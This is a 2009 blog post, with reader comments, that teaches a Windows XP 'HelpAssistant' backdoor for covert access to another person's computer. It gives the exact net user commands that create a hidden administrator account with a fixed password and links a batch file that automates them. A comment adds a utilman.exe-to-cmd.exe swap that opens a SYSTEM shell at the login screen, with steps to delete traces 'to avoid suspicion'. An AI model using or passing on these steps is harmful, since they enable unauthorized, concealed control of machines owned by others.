About Windows XP's secret "HelpAssistant" account hack

24 June, 2009 | | 4 comments |

Share |
I'm sure most of the users on Windows XP might feel impotent when they want an illegal access to a computer configured with an "Administrators" account (also known as an Admin account) with a password. Well there's a backdoor hack in Windows XP which can come to your rescue in such cases. The backdoor hack uses the HelpAssistant account pre-configured in Windows XP to tide over the above discussed problem.

**Note** that this hack works only if you currently have access to a live account with Admin privileges. This means you need to execute the following commands when you're currently logged into an Admin account. Guest accounts or one's which do not have the privilege to create and remove user account's will not be able to use this hack. You need to be logged into an Admin account to perform this hack only once and then HURRAY !!! you yourself are the admin without anyone coming to know about this. HelpAssistant hack once performed will give you complete access to Windows XP with Admin privileges .
Interesting huh ... ?

For those intellects who would like to understand the process I'm providing a comprehensive explanation for the same. The process involves executing the following three commands in command prompt:

1] The first command "cd\" changes the current location to the root location of the current drive. This step in not at all necessary but it's a good practice to execute commands in a clean prompt.

2] The second command "net user HelpAssistant /delete" deletes the pre-configured HelpAssistant account from Windows XP. This clears our way for using the backdoor hack. Make sure you preserve the cases-'H' and 'A' should be in CAPS.

3] The third command "net user HelpAssistant gg123 /add" creates an HelpAssistant account with the password "gg123". You can set the password as per your comfort.

4] The fourth command "net localgroup Administrators HelpAssistant /add" adds the HelpAssistant user to the Administrators group giving you Admin privileges.

Your HelpAssistant hack is now complete. Now when you restart your computer, at the login screen the "HelpAssistant" account logo won't show up. This is the hack-The account inspite of being present is hidden. You'll have to press "Ctrl-Alt-Del" twice at the login screen to bring up a Login window. Enter "HelpAssistant" as the Username and the password to login into the account. The Owner of the PC will never come to know that you've got admin access to his computer unless he/she is technically smart enough to know that HelpAssistant really exists. The probability of this happening is minimal so don't worry. Now enjoy unrestrained access in your PC with Admin privileges.

--> HelpAssistant account maintains your password only for 42 days and on the expiry of which you'll be prompted at the login screen to change the password. You can set the previously set password again if you want.

For lazy people who do not want to use their minds and efforts over the above process can download my executable batch-file to perform the hack for you. Make sure you run the file in a session with Admin privileges else this hack will fail. The preset password in the file is "gg123".

Here's the link: HelpAssistant Hack.zip


Colin Thomas said...

dude i think i've seen this somewhere. :P

Anonymous said...

nice cool, im gona try it

Colin Thomas said...

First boot ur comp with a live cd....i used mandriva 2009 Spring edition....

navigate to your 'C:\windows\system32' folder......

rename 'utilman.exe' as 'utilman.exe.bak'

make a duplicate copy of 'cmd.exe'

now rename this duplicate copy of 'cmd.exe' as 'utilman.exe'

reboot your computer

when you are at the login screen.....press 'Windows key + U' ..................

you have a command prompt with FULL SYSTEM RIGHTS.........now create a user without a password

after creating user reboot computer.....login with the user you created....

after you have done wht you wanted to do....'LOGOFF' (dont shutdown)

again press 'Windows key + U' ........now remove the user you created....to avoid suspicion

Idea inspired by presentation of working of Stoned bootkit by Peter Kleissner at Black Hat Con, USA 2009